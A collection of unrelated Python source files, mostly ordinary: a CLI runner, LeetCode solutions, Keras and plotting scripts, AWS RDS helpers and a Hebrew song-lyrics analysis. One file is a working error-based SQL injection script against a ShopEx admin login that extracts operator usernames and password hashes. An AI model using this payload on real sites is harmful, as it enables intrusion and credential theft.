parser.add_argument("-k","--keep-going",action="store_true",default=False,help="keep going when some task failed")
parser.add_argument("-v","--verbose",action="store_true",default=False,help="show verbose outputs")
parser.add_argument("--no-ask",action="store_true",default=False,help="do not ask for password")
parser.add_argument("-c","--config",metavar="CFG",help="use config file at CFG")
command = Command(parser)
@command(
argument("-r", "--recompile", action="store_true", help="recompile if already compiled before run"),
argument("filename", help="path to solution"))
def run(cfg, filename, recompile=False):
"""run solution"""
target = yield compile_solution(cfg, filename, recompile)
if target is None:
return
yield run_file(cfg, target)
@command(
argument("-r", "--recompile", action="store_true", help="recompile if already compiled before test"),
argument("filename", nargs='?', help="path to solution"))
def test(cfg, filename=None, recompile=False):
"""check solution against sample testcases"""
for filename, (oj, problem) in find_solutions(cfg, filename):
target = yield compile_solution(cfg, filename, recompile)
if target is None:
continue
testcases = yield find_testcases(cfg, oj, problem)
if testcases is None:
continue
for input, output in testcases:
yield run_test(cfg, target, input, output)
@command(
argument("filename", nargs='?', help="path to solution"))
def generate(cfg, filename=None, wait=False):
"""print the code to be submitted"""
code = yield generate_submission(cfg, filename)
print(code)
@command(
argument("-w","--wait",action="store_true",default=False, help="wait until verdict"),
argument("filename", nargs='?', help="path to solution"))
def submit(cfg, filename=None, wait=False):
"""submit solution"""
for filename, (oj, problem) in find_solutions(cfg, filename):
yield submit_solution(cfg, oj, problem, filename, wait)
@command(
argument("filename", nargs='?', help="path to solution"))
def clean(cfg, filename=None, wait=False):
"""removes generated files"""
for filename, (oj, problem) in find_solutions(cfg, filename):
yield clean_generated_files(cfg, filename)
@command()
def help(cfg):
"""Print help message"""
parser.print_help()
def main(cmd, args, cfg):
if args.no_ask:
cfg.NO_ASK = True
if args.verbose:
cfg.VERBOSE = True
handler.setLevel(logging.DEBUG if cfg.VERBOSE else logging.INFO)
keep_going = args.keep_going
error_occured = False
cfg.client_loader = ClientLoader(cfg)
g = cmd(cfg,args)
if g is None:
return
result = None
while True:
try:
result = g.send(result)
except StopIteration:
break
if result is None:
error_occured = True
if not keep_going:
break
if error_occured:
exit(1)
exit(0)
|
990,912 | 33132db9d4a1ef593cac30ef8bd22b2b816ac700 | from ctypes import *
kerne32 = windll.kernel32
pid = input("pid : ")
if kerne32.DebugActiveProcess(int(pid)):
print "attached:", pid
kerne32.DebugActiveProcessStop(int(pid))
print "detached:", pid
else:
print("error:",pid)
print(WinError(GetLastError()))
|
990,913 | ca59749828a646627f74f031ef57203f51875721 | from .cart import Cart
# Makes the cart available to all templates in the project
def cart(request):
return {'cart': Cart(request)}
|
990,914 | 47ac53fccf19a2067f50c18bd9306d8297d2280f | """cinema pricing"""
def main():
"""person x price"""
date = str(input()).lower()
pers = int(input())
if date in "monday tuesday":
print(pers * 120)
elif date == "wednesday":
print(pers * 80)
elif date in "thursday friday saturday sunday":
print(pers * 140)
main()
|
990,915 | 79c7d0a9f30607d11cb2fa91a2fd8bb37daaeb5b | errorCodeMessage = {}
errorCodeMessage[1062] = 'Borrower already exists' |
990,916 | e17198bb8c95397b4a8c6dc74072159b0c422c85 | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt # plt 用于显示图片
import matplotlib.image as mpimg # mpimg 用于读取图片
import numpy as np
lena = mpimg.imread('C:/Users/Administrator/Documents/test.jpg') # 读取和代码处于同一目录下的 lena.png
# 此时 lena 就已经是一个 np.array 了,可以对它进行任意处理
plt.imshow(lena) # 显示图片
plt.axis('off') # 不显示坐标轴
plt.show() |
990,917 | 52069ab12d33a1915d703a3745a03daf5ab01132 | import serial
from collections import deque
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
import tkinter as Tk
from tkinter.ttk import Frame
from itertools import count
import random
class serialPlot:
def __init__(self, puerto, baudios, longitud_grafico):
self.port = puerto
self.baud = baudios
self.plotMaxLength = longitud_grafico
print('Intentando conectar a: ' + str(puerto) + ' a ' + str(baudios) + ' BAUD.')
try:
self.serialConnection = serial.Serial(puerto, baudios, timeout=4)
print('Conectado a: ' + str(puerto) + ' a ' + str(baudios) + ' BAUD.')
except:
print("Falla al conectar a: " + str(puerto) + ' a ' + str(baudios) + ' BAUD.')
def leer_serial(self):
# lee todos los elementos del serial separados por espacios hasta el salto de linea
linea = self.serialConnection.readline()
data = [float(val) for val in linea.split()] # lista con todos los elementos separados
return data
class Window(Frame):
def __init__(self, figure, master, obj_serialPlot, maxPlotLength):
Frame.__init__(self, master)
self.master = master # ventana raiz
self.serial_plot = obj_serialPlot # objeto de la clase serialPlot
self.initWindow(figure) # Se inicializa con la funcion initWindow
self.contador = count()
self.maxLen = maxPlotLength
self.y1_vals = deque([0.0]*self.maxLen, maxlen=self.maxLen)
self.y2_vals = deque([0.0]*self.maxLen, maxlen=self.maxLen)
def initWindow(self, figure):
self.master.title("Grafico en tiempo real")
canvas = FigureCanvasTkAgg(figure, master=self.master)
toolbar = NavigationToolbar2Tk(canvas, self.master)
canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)
# Se crean los witget en el la ventana raiz
lbl1 = Tk.Label(self.master, text="Esto es un label")
lbl1.pack(padx=5, pady=5)
self.entry = Tk.Entry(self.master) # Se crea una entrada de texto
self.entry.insert(0, '1.0') # (index, string)
self.entry.pack(padx=5)
SendButton = Tk.Button(self.master, text='Send', command=self.funcionBoton) # se agrega un boton con la funcion
SendButton.pack(padx=5)
def funcionBoton(self):
print(self.serial_plot.leer_serial())
def graficar(self, frameNum, linea1,linea2):
buffer = self.serial_plot.leer_serial() #lista leida
if len(self.y1_vals) < self.maxLen:
self.y1_vals.append(buffer[0])
self.y2_vals.append(buffer[1])
else:
self.y1_vals.appendleft(buffer[0])
self.y2_vals.appendleft(buffer[1])
linea1.set_data(range(self.maxLen), self.y1_vals)
linea2.set_data(range(self.maxLen), self.y2_vals)
return linea1,linea2
def main():
#Parametros del puerto serial
portName = 'COM13'
baudRate = 9600
maxPlotLength = 100 # number of points in x-axis of real time plot
arduino = serialPlot(portName, baudRate, maxPlotLength)
#Parametros del gráfico
xmin = 0
xmax = maxPlotLength
ymin = -(1)
ymax = 100
fig = plt.figure(figsize=(4, 4))
ax = plt.axes(xlim=(xmin, xmax), ylim=(float(ymin - (ymax - ymin) / 10), float(ymax + (ymax - ymin) / 10)))
ax.set_title('Arduino data')
ax.set_xlabel("Time")
ax.set_ylabel("Humedad relativa")
linea1, = ax.plot([], [])
linea2, = ax.plot([], [])
# Tkinter's GUI
root = Tk.Tk()
app = Window(fig, root, arduino, maxPlotLength)
anim = animation.FuncAnimation(fig, app.graficar, fargs=(linea1, linea2), interval=2, blit=True)
root.mainloop()
if __name__ == '__main__':
main() |
990,918 | 6264f726f1d6df6e086e12b713e7d5f39016a02f | import json
import urllib3
post_url = "http://0.0.0.0:8383/add_task/"
data = {
"id": "2",
"info": "第二",
}
encoded_data = json.dumps(data).encode("utf-8")
http = urllib3.PoolManager()
r = http.request(
"POST",
post_url,
body=encoded_data,
headers={
'content-type': 'application/json;charset=UTF-8'
}
)
if r.status == 200:
response = r.data
if len(response) > 0:
j = json.loads(response)
print(j)
|
990,919 | 7392d0c0d1c7c281ea0bd766a2589006a0a77a6a | # -*- coding: utf-8 -*-
"""
.. codeauthor:: Daniel Seichter <daniel.seichter@tu-ilmenau.de>
"""
class SceneNetRGBDBase:
SPLITS = ['train', 'valid']
# number of classes without void (NYUv2 classes)
N_CLASSES = 13
CLASS_NAMES = ['void',
'bed',
'books',
'ceiling',
'chair',
'floor',
'furniture',
'objects',
'picture',
'sofa',
'table',
'tv',
'wall',
'window']
CLASS_COLORS = [[0, 0, 0],
[0, 0, 255],
[232, 88, 47],
[0, 217, 0],
[148, 0, 240],
[222, 241, 23],
[255, 205, 205],
[0, 223, 228],
[106, 135, 204],
[116, 28, 41],
[240, 35, 235],
[0, 166, 156],
[249, 139, 0],
[225, 228, 194]]
DEPTH_DIR = 'depth'
RGB_DIR = 'rgb'
LABELS_13_DIR = 'labels_13'
LABELS_13_COLORED_DIR = 'labels_13_colored'
|
990,920 | 3092d98465392f5aacb9ce2fae6e4bda0705188b | #problem 541 / reverse string II
#注意字符串下标,s[i:j]切片后,包括 s[i] 不包括 s[j]
class Solution(object):
def reverseStr(self, s, k):
"""
:type s: str
:type k: int
:rtype: str
"""
if k >= len(s):
return s[::-1]
if k < len(s) <= 2*k:
return s[k-1::-1]+s[k:]
return self.reverseStr(s[:2*k],k)+self.reverseStr(s[2*k:],k) |
990,921 | 9aca86a921232775b753673a175b23a72544ee0a | import boto3
class RdsNotReadyError(Exception):
pass
def create_instance(db_instance, engine):
"""Create a new RDS instance for this DB instance.
:param aws_db_addons.models.DbInstance db_instance:
:param str engine:
:raises botocore.exceptions.ClientError:
"""
rds = boto3.client('rds')
rds.create_db_instance(
DBInstanceIdentifier=db_instance.aws_instance_identifier,
AllocatedStorage=5,
DBName=db_instance.db_name,
Engine=engine,
# General purpose SSD
StorageType='gp2',
# can't encrypt t2
# StorageEncrypted=True,
AutoMinorVersionUpgrade=True,
# TODO Set this to true?
MultiAZ=False,
MasterUsername=db_instance.master_username,
MasterUserPassword=db_instance.master_password,
PubliclyAccessible=True,
DBInstanceClass='db.t2.micro')
def get_endpoint(db_instance):
"""Get the endpoint for this DB instance. Raises RdsNotReadyError if
the instance is not ready.
:param aws_db_addons.models.DbInstance db_instance:
:param str engine:
:rtype: str
:returns: The endpoint (e.g. 'localhost:1234')
:raises botocore.exceptions.ClientError:
when there is a client error, including if the instance is not found
:raises RdsNotReadyError:
"""
rds = boto3.client('rds')
instances = rds.describe_db_instances(
DBInstanceIdentifier=db_instance.aws_instance_identifier)['DBInstances']
assert len(instances) == 1
if instances[0]['DBInstanceStatus'] != 'available':
raise RdsNotReadyError('RDS instance {} is not in the "available" state. The state is "{}".'.format(
db_instance.aws_instance_identifier, instances[0]['DBInstanceStatus']))
return '{host}:{port}'.format(
host=instances[0]['Endpoint']['Address'],
port=instances[0]['Endpoint']['Port']
)
def delete_instance(db_instance):
"""Delete the RDS instance corresponding to this DB instance.
:type aws_db_addons.models.DbInstance db_instance: aws_db_addons.models.DbInstance
:raises botocore.exceptions.ClientError:
"""
rds = boto3.client('rds')
rds.delete_db_instance(
DBInstanceIdentifier=db_instance.aws_instance_identifier,
SkipFinalSnapshot=True
)
|
990,922 | 08ea73f9f61b139c7bb33aba207f1a666cf23815 | """
Given a m * n matrix grid which is sorted in non-increasing order both row-wise and column-wise.
Return the number of negative numbers in grid.
"""
class Solution(object):
def countNegatives(self, grid):
def binary_search(row):
start, end = 0, len(row)
while start < end:
mid = start + (end - start) // 2
if row[mid] < 0:
end = mid
else:
start = mid + 1
return len(row) - start
return sum([binary_search(row) for row in grid])
ans = Solution().countNegatives([[4, 3, 2, -1],
[3, 2, 1, -1],
[1, 1, -1, -2],
[-1, -1, -2, -3]])
assert ans == 8, ans
ans = Solution().countNegatives([[3, 2], [1, 0]])
assert ans == 0
|
990,923 | 84ca6ffd7994517b9735b1b6b3844aa37c67c2c6 | class Solution(object):
def searchRange_lowerandupperboundbinarysearch(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
# lower
l, r = 0, len(nums)-1
while l <= r:
m = (l+r) // 2
if nums[m] < target:
l = m + 1
else:
r = m - 1
if l == len(nums) or nums[l] != target:
return [-1,-1]
retl = l
l, r = 0, len(nums)-1
while l <= r:
m = (l+r) // 2
if nums[m] <= target:
l = m + 1
else:
r = m - 1
retr = r
return [retl, retr]
def searchRange_myself(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
def bs(nums, target, l, r):
# l and r are included.
if l <= r:
m = (l+r) // 2
if nums[m] == target:
return m
elif nums[m] < target:
return bs(nums, target, m+1, r)
else:
return bs(nums, target, l, m-1)
else:
return -1
pivot = bs(nums, target, 0, len(nums)-1)
if pivot == -1:
return [-1, -1]
left = right = pivot
while bs(nums, target, 0, left-1) != -1:
left = bs(nums, target, 0, left)
while bs(nums, target, right+1, len(nums)-1) != -1:
right = bs(nums, target, right+1, len(nums)-1)
return [left, right]
|
990,924 | 2688699cbfdaf393344e67397a13261f9ad5ae79 | import pandas as pd
import matplotlib.pyplot as plt
import os
import tempfile
tempdir = tempfile.gettempdir()
tempfolder = os.path.join(tempdir, 'dataframe')
filename = os.path.join(tempfolder,'salary.csv')
try:
salary = pd.read_csv(filename)
except:
print('Fail to read from source file')
df = salary
plt.figure(figsize=(6,5))
symbol_manag = dict(Y = '*', N = '.')
colors_edu = {'Bachelor':'r', 'Master':'g','Ph.D':'b'}
for values, d in salary.groupby(['education','management']):
edu, manager = values
plt.scatter(d['experience'], d['salary'],marker= symbol_manag[manager],color = colors_edu[edu], s = 150, label = manager+'/'+edu)
plt.xlabel('Experience')
plt.ylabel('Salary')
plt.title('A graph of lecturers salaries against experience')
plt.legend(loc = 4)
plt.savefig('scatter.svg')
plt.show()
|
990,925 | 98d944295bee89b3298f9fd8edb2cdc3ba5bf797 | class Solution(object):
def trimMean(self, arr):
"""
:type arr: List[int]
:rtype: float
"""
arr.sort()
five = int((len(arr) * 0.05))
arr = arr[five:-five]
if len(arr) == 0:
return 0
return sum(arr) / len(arr)
if __name__ == '__main__':
arr = [1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,3]
print(Solution().trimMean(arr))
arr = [6,0,7,0,7,5,7,8,3,4,0,7,8,1,6,8,1,1,2,4,8,1,9,5,4,3,8,5,10,8,6,6,1,0,6,10,8,2,3,4]
print(Solution().trimMean(arr))
|
990,926 | 57b750fe51b7da7fea9316feda177aee727c2cd3 | #!/usr/bin/python
# -*- coding:utf-8
import re,sys
sys.path.append('..')
from expFunc import *
url=sys.argv[1]
payload ="\"/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0\")*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1"
bug ="Duplicate entry"
info = "/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0"
def main():
res = HttpGet(url+payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
if res[0].find(bug)!= -1:
print(Result+url+info);
main()
|
990,927 | ca23d027d787d1fa4cc50e2aa3541e0032ee48ab | import numpy as np
import mpmath
# import COLD GASS functions
import models
def log_schechter_true(logL, log_phi, log_L0, alpha):
# print (log_phi, log_L0, alpha)
log = np.log(10)
frac = np.power(10,(alpha+1)*(logL-log_L0))
exp = np.exp(-np.power(10,logL-log_L0))
return log*log_phi*frac*exp
def double_schechter(M, gsmf_params):
Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
phi_Mstar_double = np.log(10) * np.exp(-np.power(10,M-Mstar)) * (phistar1*np.power(10,(alpha1+1)*(M-Mstar)) + phistar2*np.power(10,(alpha2+1)*(M-Mstar)))
return phi_Mstar_double
def single_schechter_analytic(M, gsmf_params):
Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
Mstar2 = np.power(10,Mstar)
phi_Mstar_single = phistar2*mpmath.gammainc(alpha2+1, M/Mstar2)
return float(str(phi_Mstar_single))
def double_schechter_analytic(M, gsmf_params):
Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
Mstar2 = np.power(10,Mstar)
phi_Mstar_double = phistar1*mpmath.gammainc(alpha1+1, M/Mstar2) + phistar2*mpmath.gammainc(alpha2+1, M/Mstar2)
return float(str(phi_Mstar_double))
def single_schechter(M, gsmf_params):
Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
phi_Mstar_double = np.log(10) * np.exp(-np.power(10,M-Mstar)) * (phistar2*np.power(10,(alpha2+1)*(M-Mstar)))
return phi_Mstar_double
def single_schechter2(M, gsmf_params):
Mstar, phistar1, alpha1, = gsmf_params
phi_Mstar_double = np.log(10) * np.exp(-np.power(10,M-Mstar)) * (phistar1*np.power(10,(alpha1+1)*(M-Mstar)))
return phi_Mstar_double
def single_schechter_linear(M, gsmf_params):
Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
Mstar2 = np.power(10,Mstar)
ratio = M/Mstar2
phi_Mstar_single = np.exp(-ratio)*((phistar2*np.power(ratio, alpha2)))*(1/Mstar2)
return phi_Mstar_single
def double_schechter_linear(M, gsmf_params):
Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
Mstar2 = np.power(10,Mstar)
ratio = M/Mstar2
# part1 = np.exp(-M/Mstar)
# part2 = (phistar1*np.power(M/Mstar, alpha1))
# part3 = (phistar2*np.power(M/Mstar, alpha2))
# print ('exp', part1)
# print ('pow1', part2)
# print ('pow2', part3)
phi_Mstar_double = np.exp(-ratio)*((phistar1*np.power(ratio, alpha1)) + (phistar2*np.power(ratio, alpha2)))*(1/Mstar2)
return phi_Mstar_double
def schechterL(luminosity, phiStar, alpha, LStar):
"""Schechter luminosity function."""
LOverLStar = (luminosity/LStar)
return (phiStar/LStar) * LOverLStar**alpha * np.exp(- LOverLStar)
def double_schechter_peak(M, M_peaked, gsmf_params, sigma):
phi_Mstar_double = double_schechter(M_peaked, gsmf_params)
# phi_Mstar_double = 0.1
phi = phi_Mstar_double*np.sqrt(2*np.pi*np.exp(sigma)*np.exp(sigma))*models.Gaussian_Conditional_Probability(M, M_peaked, sigma)
return phi
|
990,928 | 6b94e6acc2117e6cc393bcb3d72a62cb04bb1add | import keras
from keras.layers import LSTM
from keras.layers import Dense, Activation, Input, Dropout, Activation
from keras.datasets import mnist
from keras.models import Sequential, Model
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
learning_rate = 0.001
training_iters = 3
batch_size = 128
display_step = 10
n_input = 28
n_step = 28
n_hidden = 128
n_classes = 10
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(-1, n_step, n_input)
x_test = x_test.reshape(-1, n_step, n_input)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
y_train = keras.utils.to_categorical(y_train, n_classes)
y_test = keras.utils.to_categorical(y_test, n_classes)
# 模型定义1:序贯模型 Sequential
#model = Sequential()
#model.add(LSTM(n_hidden, batch_input_shape=(None, n_step, n_input), unroll=True))
#model.add(Dense(n_classes))
#model.add(Activation('softmax'))
# 模型定义2:函数式模型 Model,Sequential是Model的特殊情况
#inputs = Input(shape=(n_step, n_input))
#x = LSTM(n_hidden, unroll=True)(inputs)
#predictions = Dense(n_classes, activation='softmax')(x)
#model = Model(inputs=inputs, outputs=predictions)
inputs = Input(shape=(n_step, n_input))
X = LSTM(n_hidden, return_sequences=True)(inputs)
X = Dropout(0.5)(X)
X = LSTM(128)(X)
X = Dropout(0.5)(X)
X = Dense(n_classes)(X)
predictions = Activation('softmax')(X)
model = Model(inputs=inputs, outputs=predictions)
adam = Adam(lr=learning_rate)
model.summary()
model.compile(optimizer=adam,
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=training_iters,
verbose=1,
validation_data=(x_test, y_test),
callbacks=[TensorBoard(log_dir='./logs/keras_mnist_lstm/')])
scores = model.evaluate(x_test, y_test, verbose=0)
print('LSTM test score:', scores[0])
print('LSTM test accuracy:', scores[1]) |
990,929 | 6875b4aafa85198e6be282a9db46dfbf1b863533 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/3/29 20:56
# @Author : lingxiangxiang
# @File : demon1.py
'''
这是一个测试程序
'''
"""
hello world
"""
# java c 都需要先声明,在实例化
# int a; a = 10;
a = 10
b = "hello world"
c = 11.961
d = True
print(type(a))
print(type(b))
print(type(c))
print(type(d))
print(int(c))
print(round(c, 1))
# 字符串常用的方法:
# strip 字符串过滤空格,有事没事,你用一下,只能过滤前和尾的空格
# replace(old, new) 字符串内容老的替换新的
# find(sub) 字符串中查找sub字符串的内容,如果找到,返回自字符串的下标,否则返回-1
# format 字符串格式化
# split 切割字符串
print(" a1 b 2c3d4".strip())
print("a1b1c1d1".split("1"))
print("asdfasjdfas".startswith("asd"))
name = "lingxiangxiang"
shang = 18
print("hello " + name)
print("%s's age is: %d" %(name, shang))
str1 = "a1b1c1d1"
print(str1[0])
print(str1[1])
print(str1[2])
print(str1[3])
print(str1[4])
print(str1[5])
a = ["a", "b", "c", "d", "e"]
print("------".join(a))
print(a)
"".split()
a = "a1b2c3d4"
print(a)
|
990,930 | 0e6551ca9068693ab96f952490133763937b7ad8 | # vi: ts=8 sts=4 sw=4 et
#
# config.py: config commands
#
# This file is part of Draco2. Draco2 is free software and is made available
# under the MIT license. Consult the file "LICENSE" that is distributed
# together with this file for the exact licensing terms.
#
# Draco2 is copyright (c) 1999-2007 by the Draco2 authors. See the file
# "AUTHORS" for a complete overview.
#
# $Revision: $
from draco2.core.model import Config
from draco2.command.command import Command
class SetConfig(Command):
"""Set a configuration key."""
name = 'set'
description = 'create a config item'
usage = '%prog [options] %command <key> <value>'
nargs = 2
def run(self, opts, args, api):
key, value = args
model = api.models.model('draco')
transaction = model.transaction()
configs = transaction.select(Config, 'key = %s', (key,))
if configs:
config = configs[0]
config['value'] = value
else:
config = Config(key=key, value=value)
transaction.insert(config)
transaction.commit()
class DeleteConfig(Command):
"""Delete a configuration key."""
name = 'delete'
description = 'delete a config item'
usage = '%prog [options] %command <key>'
nargs = 1
def run(self, opts, args, api):
key = args[0]
model = api.models.model('draco')
transaction = model.transaction()
configs = transaction.select(Config, 'key = %s', (key,))
if not configs:
self.error('configuration key "%s" does not exist' % key)
self.exit(1)
transaction.delete(configs[0])
transaction.commit()
class ListConfig(Command):
"""List all configuration keys."""
name = 'list'
description = 'list all config items'
def run(self, opts, args, api):
model = api.models.model('draco')
transaction = model.transaction()
configs = transaction.select(Config)
for config in configs:
self.write('-> %s = %s\n' % (config['key'], config['value']))
class ConfigCommand(Command):
"""Configuration meta command."""
name = 'config'
description = 'manage configuration'
def __init__(self):
super(ConfigCommand, self).__init__()
self.add_subcommand(SetConfig())
self.add_subcommand(DeleteConfig())
self.add_subcommand(ListConfig())
|
990,931 | d4aaa8f38a25121e2e122bc58aa3266edb316a6c | import re
from typing import List, Tuple, Set
from collections import Counter, defaultdict
import numpy as np
import pandas as pd
from tqdm import tqdm
import seaborn as sns
from click import secho
import stanza as stanza
import matplotlib.pyplot as plt
from datasets import load_dataset
from pandas import DataFrame, Series
from pandas.core.strings import StringMethods
from sklearn import tree
from sklearn.metrics import accuracy_score
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.tree import DecisionTreeClassifier, export_text
from model_evaluater import evaluate
DECADES = [1970, 1980, 1990, 2000, 2010, 2020]
EPOCHS = 3
ISRAEL_WARS = ['1973', '1982','2006', '2008', '2012', '2014', '2021']
class Emotions:
norm = 0
happy = 2
sad = 1
class HebrewSongs:
def __init__(self, path: str = 'data/tagged_data.tsv', normalize_rymes: bool = False):
self.data: DataFrame = pd.read_csv(path, '\t')
self.data['decade'] = [int(int(year) / 10) * 10 if type(year) != float and year.isdigit() else 0 for year in self.data["year"]]
self.data['lyrics_len'] = [len(lyric.split(' ')) for lyric in self.data['lyrics']]
self.stop_words: List[str] = HebrewSongs.get_stop_words('stopwords.txt')
self.stop_words_n_grams_2: List[str] = HebrewSongs.get_stop_words('stopwords_ngrams_2.txt')
self.add_name_in_song()
self.add_rhymes(normalize=normalize_rymes)
self.data_hits = self.data[self.data['hit'] == 1]
def add_colmn(self):
with open('emotions.txt', 'r') as f:
emotions_str = f.read().split(',')
emotions_int = list(map(lambda x: int(x), emotions_str))
self.data['song_sentiment'] = emotions_int
self.data.to_csv('data/tagged_data.tsv', sep='\t')
def get_decade(self, decade: int) -> DataFrame:
if decade not in DECADES:
secho(f"[ERROR] decade ({decade}) should be one of the following:", fg="red", bold=True)
secho(f" {DECADES}", fg="red")
exit(1)
return self.data.loc[(int(self.data['year']) >= decade) & (int(self.data['year']) <= (decade + 9))]
def get_year(self, year: int) -> DataFrame:
return self.data.loc[self.data['year'] == year]
def get_artists_gender(self, hits=False):
male = 0
female = 1
band = 2
mans = []
females = []
bands = []
for decade in DECADES[:-1]:
data = self.data[self.data['decade'] == decade]
if hits:
data = data[data['hit'] == 1]
gender_in_hist = data['gender'].value_counts(normalize=True)
mans.append(gender_in_hist[male] * 100)
females.append(gender_in_hist[female] * 100)
bands.append(gender_in_hist[band] * 100)
p1 = plt.bar(DECADES[:-1], mans, 2, color='dodgerblue', label='man singers')
p2 = plt.bar(DECADES[:-1], females, 2, bottom=mans, color='deeppink', label='women singers')
p3 = plt.bar(DECADES[:-1], bands, 2,
bottom=np.array(mans) + np.array(females), color='orange', label="bands")
if not hits:
plt.title('gender of artists')
else:
plt.title('gender of artists in hits')
plt.xlabel('decade')
plt.ylabel('precentage of singing gender')
plt.legend()
plt.show()
def get_lyrics(self, df: DataFrame = DataFrame()):
all_lyrics: Series = self.data["lyrics"] if df.empty else df["lyrics"]
all_lyrics_str: StringMethods = all_lyrics.str
words: Series = all_lyrics_str.split()
words: List[List[str]] = words.values.tolist()
return [word for i in words for word in i]
def get_most_common(self, n: int, decade: int = None, use_stopwords: bool = True):
corpus: List[str] = self.get_lyrics(self.data[self.data['decade'] == decade])
counter = Counter(corpus)
most = counter.most_common()
x, y = [], []
for word, count in most:
if use_stopwords:
if word not in self.stop_words:
x.append(word)
y.append(count)
else:
x.append(word)
y.append(count)
if len(x) == n:
break
sns.barplot(x=y, y=HebrewSongs.invert_words(x), palette='Paired')
plt.show()
def get_emotions_to_wars_plot(self):
sad_songs = []
happy_songs = []
ISRAEL_WARS_plus_1 = [str(int(year)+1) for year in ISRAEL_WARS]
for year in ['sad_years', 'non_sad']:
if year == 'sad_years':
decade_data = self.data[self.data['year'].isin(ISRAEL_WARS+ISRAEL_WARS_plus_1)]
else:
decade_data = self.data[-self.data['year'].isin(ISRAEL_WARS+ISRAEL_WARS_plus_1)]
count_values = decade_data["song_sentiment"].value_counts(normalize=True)
sad_songs.append(count_values[Emotions.sad])
happy_songs.append(count_values[Emotions.happy] + count_values[Emotions.norm])
n = 2
r = np.arange(n)
width = 0.25
plt.bar(r, sad_songs, color='#a3ff58',
width=width, edgecolor='black',
label='sad songs')
plt.ylabel("songs emotion ")
plt.title("songs sentiment in war years")
plt.xticks(r + width / 2, ['war years', 'not war years'])
plt.legend()
plt.show()
def get_emotions_plot(self, hits: bool = False):
male = 0
female = 1
band = 2
sad_songs = []
happy_songs = []
normal_songs = []
if hits:
self.data = self.data[self.data['hit'] == 1]
for gender in [male, female, band]:
decade_data = self.data[self.data["gender"] == gender]
count_values = decade_data["song_sentiment"].value_counts(normalize=True)
sad_songs.append(count_values[Emotions.sad])
happy_songs.append(count_values[Emotions.happy])
normal_songs.append(count_values[Emotions.norm])
n = 3
r = np.arange(n)
width = 0.2
plt.bar(r, sad_songs, color='#a3ff58',
width=width, edgecolor='black',
label='sad songs')
plt.bar(r + 2*width, happy_songs, color='#ff58a3',
width=width, edgecolor='black',
label='happy songs')
plt.bar(r + width, normal_songs, color='#D3D3D3',
width=width, edgecolor='black',
label='normal songs')
plt.xlabel("Gender")
plt.ylabel("songs emotion ")
plt.title(f"songs sentiment vs gender {'(hits)' if hits else ''}")
plt.xticks(r + width / 2, ['male', 'female', 'band'])
plt.legend()
plt.show()
def get_song_length_from_years(self):
self.data['lyrics_len'] = [len(lyric.split(' ')) for lyric in self.data['lyrics']]
self.data['decade'] = [int(int(year) / 10) * 10 if type(year) != float and year.isdigit() else 0 for year in
self.data["year"]]
length_from_years = self.data[["lyrics_len", "decade"]].groupby("decade").mean()
x, y = [], []
for year, length in length_from_years.iterrows():
if year <= 1960:
continue
x.append(str(year))
y.append(length[0])
width = 0.4
barlist = plt.bar(np.arange(len(y)), y, width=width)
for i, color in enumerate(["#2AC3FF", "#FF2A7C", "#FF632A", "#FFC32A", "#DFFF2A", "#b9e769"]):
barlist[i].set_color(color)
plt.xlabel("Decade")
plt.ylabel("Average length of songs")
plt.title("decade vs length of songs")
plt.xticks(np.arange(len(y)), x)
plt.legend()
plt.show()
def get_ngram_most_common(self, n: int, df: DataFrame = DataFrame(), decade=None, ngram_range: tuple = (3, 4), show=True):
data = self.data
if decade is not None:
data = self.data[self.data['decade'] == decade]
all_lyrics: Series = data["lyrics"] if df.empty else df["lyrics"]
vec = CountVectorizer(ngram_range=ngram_range, lowercase=True, binary=True).fit(all_lyrics)
bag_of_words = vec.transform(all_lyrics)
sum_words = bag_of_words.sum(axis=0)
words_freq = [(word, sum_words[0, idx])
for word, idx in vec.vocabulary_.items()
if word not in self.stop_words_n_grams_2]
top_n_bigrams: List[Tuple[str]] = sorted(words_freq, key=lambda x: x[1], reverse=True)[:n]
x, y = map(list, zip(*top_n_bigrams))
sns.barplot(x=y, y=HebrewSongs.invert_words(x))
if show:
plt.title(decade if decade else "")
plt.xlabel("תורידת")
plt.show()
return x
def uniqe_ngram_per_decade(self, ngram_range=(3,4)):
decades_words = {}
for decade in DECADES:
m = self.get_ngram_most_common(15, decade=decade, ngram_range=ngram_range, show=False)
decades_words[decade] = m
uniqe_per_decade = {}
for decade in DECADES:
words = decades_words[decade]
uniwq_words = []
for word in words:
seen = False
for d in DECADES:
if d != decade:
if word in decades_words[d]:
seen = True
if not seen:
uniwq_words.append(word)
